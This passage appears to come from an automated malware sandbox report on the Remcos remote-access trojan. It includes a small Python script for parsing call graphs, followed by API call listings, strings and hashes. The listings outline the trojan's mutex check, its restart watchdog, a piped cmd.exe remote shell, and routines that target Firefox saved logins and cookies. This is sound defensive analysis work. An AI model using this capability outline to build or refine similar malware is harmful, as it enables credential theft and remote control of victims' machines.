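    "45958 40d5fc OpenMutexA 45954->45958 45963 40d622 45958->45963 45964 40d60f "
    "WaitForSingleObject CloseHandle 45958->45964 45964->45963 46337 411f34 "
    "RegOpenKeyExA RegQueryValueExA RegCloseKey 45963->46337 45976 40d63b "
    "45976->45949 46337->45976"
)

NODE_ID_RE = re.compile(r"^\d{4,}$")        # node ids are 5-digit counters
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}$")    # function start address, lower-case hex
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
SYMBOL_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_:@$?~]*$")
NOISE = {"API", "calls", "library", "execution_graph"}   # from "28 API calls" summaries

def parse_execution_graph(text):
    """Returns (nodes, edges): nodes[id] = {"addr", "labels"}, edges[id] = [child ids]."""
    nodes, edges, current = {}, {}, None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.setdefault(m.group(1), []).append(m.group(2))
            current = None
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[tok] = {"addr": tokens[i + 1], "labels": []}
            i += 1                      # the address token belongs to this node
        elif current is not None:
            nodes[current]["labels"].append(tok)   # symbols trailing a node
        i += 1
    return nodes, edges

def symbols(nodes, node_id):
    """API / runtime symbol names at a node, with call-count summaries filtered out."""
    return [t for t in nodes.get(node_id, {"labels": []})["labels"]
            if SYMBOL_RE.match(t) and t not in NOISE]

def nodes_calling(nodes, symbol):
    return sorted(n for n in nodes if symbol in symbols(nodes, n))

def path_to_symbol(nodes, edges, start, symbol):
    """BFS along call edges; address chain to the first node calling `symbol`, else None."""
    prev, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if symbol in symbols(nodes, n):
            chain = []
            while n is not None:
                chain.append(nodes.get(n, {}).get("addr", n))
                n = prev[n]
            return chain[::-1]
        for child in edges.get(n, []):
            if child not in prev:
                prev[child] = n
                queue.append(child)
    return None

def reachable_symbols(nodes, edges, start):
    """Every symbol on any node reachable from `start`."""
    seen, stack, found = {start}, [start], set()
    while stack:
        n = stack.pop()
        found.update(symbols(nodes, n))
        for child in edges.get(n, []):
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return found

if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    print(" -> ".join(path_to_symbol(nodes, edges, "45954", "CreateMutexA")))
    print(sorted(reachable_symbols(nodes, edges, "45803")))
```

On the sample, the path from 40d5f5 runs through OpenMutexA, a registry query at 411f34 and then CreateMutexA at 40d660, which is the single-instance check the mutex signature in the overview refers to; run the same query against the full dump text to locate the caller chain for CreateProcessA or the CreateThread nodes.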

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                          • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                          • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                          • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                          • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                          • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule$LibraryLoad
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                          • API String ID: 551388010-2474455403
                          • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                          • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                          • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                          • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 4407b5-4407ef with calls to GetPEB, GetCurrentProcess, TerminateProcess and ExitProcess.]
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                          • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                          • ExitProcess.KERNEL32 ref: 004407EF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                          • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                          • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                          • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 40d3f0-40dd6f with calls to OpenMutexA, WaitForSingleObject, CloseHandle, CreateMutexA, GetLastError, GetModuleFileNameW and CreateThread.]
                          APIs
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                            • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                            • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                            • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                            • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                          • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                          • API String ID: 1529173511-1365410817
                          • Opcode ID: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                          • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                          • Opcode Fuzzy Hash: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                          • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                          Control-flow Graph

                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                          • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                          • closesocket.WS2_32(?), ref: 00404E3A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                          • String ID:
                          • API String ID: 3658366068-0
                          • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                          • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                          • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                          • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 445a95-445b0f with calls to LoadLibraryExW, GetLastError and FreeLibrary.]
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                          • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                          • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                          • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                          • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 4459f9-445a94 with a call to GetProcAddress.]
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                          • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                          • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                          • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 40163e-401693 with internal calls only.]
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                          • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                          • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                          • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 44d2b4-44d32d with internal calls only.]
                          APIs
                            • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                          • _free.LIBCMT ref: 0044D320
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                          • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                          • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                          • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 443005-443061 with a call to RtlAllocateHeap.]
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                          • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                          • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                          • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

                          Control-flow Graph

                          [Control-flow graph (executed / not executed node colouring) not reproduced here; graph covers 443649-443696 with a call to RtlAllocateHeap.]
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                          • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                          • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                          • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                            • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                            • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                            • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                          • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                          • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                          • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                          • API String ID: 3018269243-1736093966
                          • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                          • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                          • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                          • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004056C6
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • __Init_thread_footer.LIBCMT ref: 00405703
                          • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                          • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                          • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                          • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                          • CloseHandle.KERNEL32 ref: 00405A03
                          • CloseHandle.KERNEL32 ref: 00405A0B
                          • CloseHandle.KERNEL32 ref: 00405A1D
                          • CloseHandle.KERNEL32 ref: 00405A25
                          Similarity
                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                          • String ID: SystemDrive$cmd.exe
                          • API String ID: 2994406822-3633465311
                          • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                          • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                          • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                          • FindClose.KERNEL32(00000000), ref: 0040AB0A
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                          • FindClose.KERNEL32(00000000), ref: 0040AC53
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                          • API String ID: 1164774033-3681987949
                          • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                          • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                          • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 0$1$2$3$4$5$6$7
                          • API String ID: 0-3177665633
                          • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                          • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                          • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                          APIs
                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                          • GetLastError.KERNEL32 ref: 00418771
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                          Similarity
                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                          • String ID:
                          • API String ID: 3587775597-0
                          • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                          • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                          • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                          • FindClose.KERNEL32(00000000), ref: 0040B3BE
                          • FindClose.KERNEL32(00000000), ref: 0040B3E9
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 1164774033-405221262
